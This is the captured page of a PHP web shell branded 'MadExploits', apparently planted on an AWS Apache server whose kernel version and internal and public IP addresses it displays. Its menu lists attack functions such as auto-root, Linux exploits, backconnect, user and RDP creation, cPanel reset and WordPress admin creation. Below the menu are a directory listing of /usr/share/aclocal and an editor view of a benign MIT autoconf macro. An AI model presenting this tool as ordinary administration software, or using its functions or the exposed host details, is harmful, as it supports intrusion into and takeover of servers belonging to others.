Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.217.142.228
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
aclocal /
[ HOME SHELL ]
Name
Size
Permission
Action
ac_check_krb5.m4
2.14
KB
-rw-r--r--
bison-i18n.m4
1.89
KB
-rw-r--r--
cmake.m4
1.43
KB
-rw-r--r--
codeset.m4
842
B
-rw-r--r--
expat.m4
1.41
KB
-rw-r--r--
extern-inline.m4
4.27
KB
-rw-r--r--
fcntl-o.m4
4.56
KB
-rw-r--r--
gettext.m4
15.49
KB
-rw-r--r--
glib-2.0.m4
8.12
KB
-rw-r--r--
glib-gettext.m4
15.38
KB
-rw-r--r--
glibc2.m4
830
B
-rw-r--r--
glibc21.m4
907
B
-rw-r--r--
gsettings.m4
3.5
KB
-rw-r--r--
iconv.m4
9.06
KB
-rw-r--r--
intdiv0.m4
2.35
KB
-rw-r--r--
intl.m4
11.84
KB
-rw-r--r--
intldir.m4
917
B
-rw-r--r--
intlmacosx.m4
2.47
KB
-rw-r--r--
intmax.m4
1.1
KB
-rw-r--r--
inttypes-pri.m4
1.22
KB
-rw-r--r--
inttypes_h.m4
1020
B
-rw-r--r--
lcmessage.m4
1.33
KB
-rw-r--r--
lib-ld.m4
3.6
KB
-rw-r--r--
lib-link.m4
32.28
KB
-rw-r--r--
lib-prefix.m4
8.27
KB
-rw-r--r--
libcurl.m4
10.91
KB
-rw-r--r--
libmcrypt.m4
8.42
KB
-rw-r--r--
libtool.m4
299.49
KB
-rw-r--r--
libxml2.m4
7.7
KB
-rw-r--r--
libxslt.m4
7.93
KB
-rw-r--r--
lock.m4
1.43
KB
-rw-r--r--
longlong.m4
4.63
KB
-rw-r--r--
ltargz.m4
2.51
KB
-rw-r--r--
ltdl.m4
29.34
KB
-rw-r--r--
ltoptions.m4
14.17
KB
-rw-r--r--
ltsugar.m4
4.28
KB
-rw-r--r--
ltversion.m4
699
B
-rw-r--r--
lt~obsolete.m4
6
KB
-rw-r--r--
nls.m4
1.19
KB
-rw-r--r--
pkg.m4
10.01
KB
-rw-r--r--
po.m4
18.52
KB
-rw-r--r--
printf-posix.m4
1.54
KB
-rw-r--r--
progtest.m4
3.02
KB
-rw-r--r--
shtool.m4
2.05
KB
-rw-r--r--
size_max.m4
2.99
KB
-rw-r--r--
stdint_h.m4
995
B
-rw-r--r--
tcl.m4
95.99
KB
-rw-r--r--
tcl8.6.m4
95.99
KB
-rw-r--r--
threadlib.m4
14.8
KB
-rw-r--r--
uintmax_t.m4
1.09
KB
-rw-r--r--
visibility.m4
3.27
KB
-rw-r--r--
wchar_t.m4
818
B
-rw-r--r--
wint_t.m4
1.03
KB
-rw-r--r--
xsize.m4
406
B
-rw-r--r--
xtrans.m4
6.38
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ac_check_krb5.m4
dnl Copyright (C) 2005 by the Massachusetts Institute of Technology. dnl All rights reserved. dnl dnl Export of this software from the United States of America may dnl require a specific license from the United States Government. dnl It is the responsibility of any person or organization contemplating dnl export to obtain such a license before exporting. dnl dnl WITHIN THAT CONSTRAINT, permission to use, copy, modify, and dnl distribute this software and its documentation for any purpose and dnl without fee is hereby granted, provided that the above copyright dnl notice appear in all copies and that both that copyright notice and dnl this permission notice appear in supporting documentation, and that dnl the name of M.I.T. not be used in advertising or publicity pertaining dnl to distribution of the software without specific, written prior dnl permission. Furthermore if you modify this software you must label dnl your software as modified software and not distribute it in such a dnl fashion that it might be confused with the original M.I.T. software. dnl M.I.T. makes no representations about the suitability of dnl this software for any purpose. It is provided "as is" without express dnl or implied warranty. dnl AC_CHECK_KRB5 dnl dnl Check for krb5-config; update CPPFLAGS and LDFLAGS accordingly. dnl AC_DEFUN([AC_CHECK_KRB5], [AC_ARG_WITH([kerberos5], [ --with-kerberos5=PATH Enable Kerberos 5 support], [if test "x$withval" != "xno"; then if test "x$withval" = "xyes"; then KRB5ROOT=/usr/local else KRB5ROOT=${withval} fi AC_MSG_CHECKING([for krb5-config]) if test -x "$KRB5ROOT/bin/krb5-config"; then KRB5CONF=$KRB5ROOT/bin/krb5-config AC_MSG_RESULT([$KRB5CONF]) AC_MSG_CHECKING([for gssapi support in krb5-config]) if "$KRB5CONF" | grep gssapi > /dev/null; then AC_MSG_RESULT([yes]) k5confopts=gssapi else AC_MSG_RESULT([no]) k5confopts= fi K5CFLAGS=`"$KRB5CONF" --cflags $k5confopts` CPPFLAGS="$CPPFLAGS $K5CFLAGS" K5LIBS=`"$KRB5CONF" --libs $k5confopts` LIBS="$LIBS $K5LIBS" else AC_MSG_RESULT([no]) AC_MSG_WARN([--with-kerberos5 specified but krb5-config not found]) fi fi]) ])
Close